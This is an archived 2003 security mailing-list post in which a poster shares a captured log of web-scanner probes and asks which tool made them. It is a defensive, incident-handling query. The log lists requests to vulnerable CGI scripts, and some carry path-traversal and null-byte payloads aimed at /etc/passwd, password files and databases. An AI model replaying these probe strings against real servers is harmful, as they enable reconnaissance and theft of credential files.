HEAD /ConsoleHelp/login.jsp HTTP/1.0\x0a\x0a
HEAD /login.jsp HTTP/1.0\x0a\x0a
HEAD /cgi-bin/mailfile.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/mailform.pl HTTP/1.0\x0a\x0a
HEAD /cgi-bin/maillist.pl HTTP/1.0\x0a\x0a
HEAD /cgi-bin/mailnews.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/mailto.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/man.sh HTTP/1.0\x0a\x0a
HEAD /manual.php HTTP/1.0\x0a\x0a
HEAD /cgi-bin/mdma.bat HTTP/1.0\x0a\x0a
HEAD /cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES= HTTP/1.0\x0a\x0a
HEAD /class/mysql.class HTTP/1.0\x0a\x0a
HEAD /names.nsf HTTP/1.0\x0a\x0a
HEAD /ncl_items.html?SUBJECT=2097 HTTP/1.0\x0a\x0a
Call Pantek today for Open Source Technical Support at 1-877-546-8934 - 24/7/365 
In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software:Learn more about Pantek's Technical Support offerings
Place an order for 24/7/365 Technical Support here
Learn more about Pantek, who we are, and what we do
Chat with a Live Operator
Related securityfocus.com Links
bugtraq
certification
focus-bsd
focus-ids
focus-ih
focus-linux
focus-ms
focus-sun
focus-unix-other
focus-virus
forensics
incidents
libnet
linux-secnews
ms-secnews
pen-test
secpapers
secprog
sectools
secureshell
security-basics
securityjobs
sf-news
vuln-dev
webappsec
Request more information about Pantek
HEAD /cgi-bin/netauth.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/news/news.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/nph-maillist.pl HTTP/1.0\x0a\x0a
HEAD /cgi-bin/nph-publish HTTP/1.0\x0a\x0a
HEAD /cgi-bin/nph-test-cgi HTTP/1.0\x0a\x0a
HEAD /examples/jsp/num/numguess.js%70 HTTP/1.0\x0a\x0a
HEAD /cgi-bin/pagelog.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/pals-cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/newsdesk.cgi?t=../pass.txt HTTP/1.0\x0a\x0a
HEAD /opendir.php?requesturl=/etc/passwd HTTP/1.0\x0a\x0a
HEAD /piranha/secure/passwd.php3 HTTP/1.0\x0a\x0a
HEAD /cgi-bin/perlshop.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/pfdisplay.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/phf HTTP/1.0\x0a\x0a
HEAD /cgi-bin/phf.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/php HTTP/1.0\x0a\x0a
HEAD /cgi-bin/php.cgi HTTP/1.0\x0a\x0a
HEAD /phpgroupware/inc/phpgwapi/phpgw.inc.php HTTP/1.0\x0a\x0a
HEAD /cgi-bin/plusmail HTTP/1.0\x0a\x0a
HEAD /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/bin/ls%00 HTTP/1.0

\x0a\x0a

HEAD /cgi-bin/postings.cgi?
action=reply&forum=&number=1&topic=000001.cgi&TopicSubject=&replyto=0 HTTP/1.0\x0a\x0a

HEAD /cgi-bin/post-query HTTP/1.0\x0a\x0a
HEAD /cgi-bin/processit.pl HTTP/1.0\x0a\x0a
HEAD /PSUser/PSCOErrPage.htm HTTP/1.0\x0a\x0a
HEAD /pservlet.html HTTP/1.0\x0a\x0a
HEAD /cgi-bin/ipf/etc/gfw/ui/pwd.dat HTTP/1.0\x0a\x0a
HEAD /Newuser?Image=../../database/rbsserv.mdb HTTP/1.0\x0a\x0a
HEAD /cgi-bin/redirect.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/register.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/responder.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/rpm_query HTTP/1.0\x0a\x0a
HEAD /cgi-bin/rwwwshell.pl HTTP/1.0\x0a\x0a
HEAD /sawmill HTTP/1.0\x0a\x0a
HEAD /scancfg.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/search.cgi?letter= HTTP/1.0\x0a\x0a
HEAD /cgi-bin/Search.pl HTTP/1.0\x0a\x0a
HEAD /ROADS/cgi-bin/search.pl HTTP/1.0\x0a\x0a
HEAD /inc/sendmail.inc HTTP/1.0\x0a\x0a
HEAD /setpasswd.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/simplestguest.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/simplestmail.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi HTTP/1.0\x0a\x0a
HEAD /html/snort2html.html HTTP/1.0\x0a\x0a
HEAD /snort2html.html HTTP/1.0\x0a\x0a
HEAD /site/eg/source.asp HTTP/1.0\x0a\x0a
HEAD /secret/secret/sql_tool.shtml HTTP/1.0\x0a\x0a
HEAD /cd-cgi/sscd_suncourier.pl HTTP/1.0\x0a\x0a
HEAD /stat.htm HTTP/1.0\x0a\x0a
HEAD /stats.htm HTTP/1.0\x0a\x0a
HEAD /stats.html HTTP/1.0\x0a\x0a
HEAD /stats.txt HTTP/1.0\x0a\x0a
HEAD /scripts/submit.cgi HTTP/1.0\x0a\x0a
HEAD /users/scripts/submit.cgi HTTP/1.0\x0a\x0a
HEAD /submit.php?CONF=anything HTTP/1.0\x0a\x0a
HEAD /cgi-bin/subscribe.pl HTTP/1.0\x0a\x0a
HEAD /subscribe.pl?test@test.com HTTP/1.0\x0a\x0a
HEAD /survey HTTP/1.0\x0a\x0a
HEAD /cgi-bin/survey.cgi HTTP/1.0\x0a\x0a
HEAD /technote/main.cgi/oops?

board=FREE_BOARD&command=down_load&filename=/../../../main.cgi HTTP/1.0
\x0a\x0a

HEAD /technote/print.cgi HTTP/1.0\x0a\x0a
HEAD /test/test.cgi HTTP/1.0\x0a\x0a

HEAD /cgi-bin/test-cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/textcounter.pl HTTP/1.0\x0a\x0a HEAD /cgi-bin/search/tidfinder.cgi?2956734 HTTP/1.0\x0a\x0a HEAD /cgi-bin/ultraboard.cgi HTTP/1.0\x0a\x0a HEAD /ultraboard.pl HTTP/1.0\x0a\x0a HEAD /cgi-bin/unlg1.1 HTTP/1.0\x0a\x0a HEAD /cgi-bin/unlg1.2 HTTP/1.0\x0a\x0a HEAD /cgi-bin/upload_file.pl HTTP/1.0\x0a\x0a HEAD /user.php&op=saveuser HTTP/1.0\x0a\x0a HEAD /cgi-auth/userreg.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/ustorekeeper.pl HTTP/1.0\x0a\x0a HEAD /cgi-bin/view_page.html HTTP/1.0\x0a\x0a HEAD /cgi-bin/view-source HTTP/1.0\x0a\x0a HEAD /search97cgi/vtopic HTTP/1.0\x0a\x0a HEAD /cgi-bin/w3-msql HTTP/1.0\x0a\x0a HEAD /cgi-bin/wais.pl HTTP/1.0\x0a\x0a HEAD /way-board/way-board.cgi HTTP/1.0\x0a\x0a HEAD /webaccess.htm HTTP/1.0\x0a\x0a HEAD /cgi-bin/webdata.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/webdist.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/webdriver HTTP/1.0\x0a\x0a HEAD /cgi-bin/webgais HTTP/1.0\x0a\x0a HEAD //WEB-INF/ HTTP/1.0\x0a\x0a HEAD /cgi-bin/replicator/webpage.cgi HTTP/1.0\x0a\x0a HEAD /cgi-bin/webplus.cgi?Script=/webplus/webping/webping.wml HTTP/1.0
\x0a\x0a

HEAD /cgi-bin/websendmail HTTP/1.0\x0a\x0a
HEAD /cgi-bin/webspirs.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/webwho.pl HTTP/1.0\x0a\x0a
HEAD /cgi-bin/scripts/whois.cgi?action=load&whois=check HTTP/1.0\x0a\x0a
HEAD /cgi-bin/whois_raw.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/wrap.cgi HTTP/1.0\x0a\x0a
HEAD /WSFTP.LOG HTTP/1.0\x0a\x0a
HEAD /cgi-bin/wwwboard.pl HTTP/1.0\x0a\x0a
HEAD /cgi-bin/www-sql HTTP/1.0\x0a\x0a
Do you need help? 
In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software:Learn more about Pantek's Technical Support offerings
Place an order for 24/7/365 Technical Support here
Learn more about Pantek, who we are, and what we do
Chat with a Live Operator
Related securityfocus.com Links
bugtraq
certification
focus-bsd
focus-ids
focus-ih
focus-linux
focus-ms
focus-sun
focus-unix-other
focus-virus
forensics
incidents
libnet
linux-secnews
ms-secnews
pen-test
secpapers
secprog
sectools
secureshell
security-basics
securityjobs
sf-news
vuln-dev
webappsec
Request more information about Pantek

OPTIONS / HTTP/1.1\x0d\x0atranslate: f\x0d\x0aUser-Agent: Microsoft- WebDAV-MiniRedir/5.1.2600\x0d\x0aHost: 159.37.8.1\x0d\x0aContent-Length: 0
\x0d\x0aConnection: Keep-Alive\x0d\x0a\x0d\x0a
SEARCH / HTTP/1.0\x0d\x0a\x0d\x0a

Thanks for any leads,
Dean

Powerful Anti-Spam Management and More... SurfControl E-mail Filter puts the brakes on spam, viruses and malicious code. Safeguard your business critical communications. Download a free 30-day trial: http://www.securityfocus.com/SurfControl-incidents Received on Sun Apr 6 23:42:56 2003

This message: [ Message body ]
Next message: Laurent Luyckx: "Re: Does anyone recognize the scanner that causes this pattern ?"
Previous message: Bojan Zdrnja: "Re: SMTP probes"
Next in thread: Laurent Luyckx: "Re: Does anyone recognize the scanner that causes this pattern ?"
Reply: Laurent Luyckx: "Re: Does anyone recognize the scanner that causes this pattern ?"
Reply: Jerry Shenk: "RE: Does anyone recognize the scanner that causes this pattern ?"
Reply: Justin Coffi: "RE: Does anyone recognize the scanner that causes this pattern ?"
Reply: dean(at)packethunter.com: "Re: Does anyone recognize the scanner that causes this pattern ?"
Reply: Gene: "Re: Does anyone recognize the scanner that causes this pattern ?"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:02:01 EDT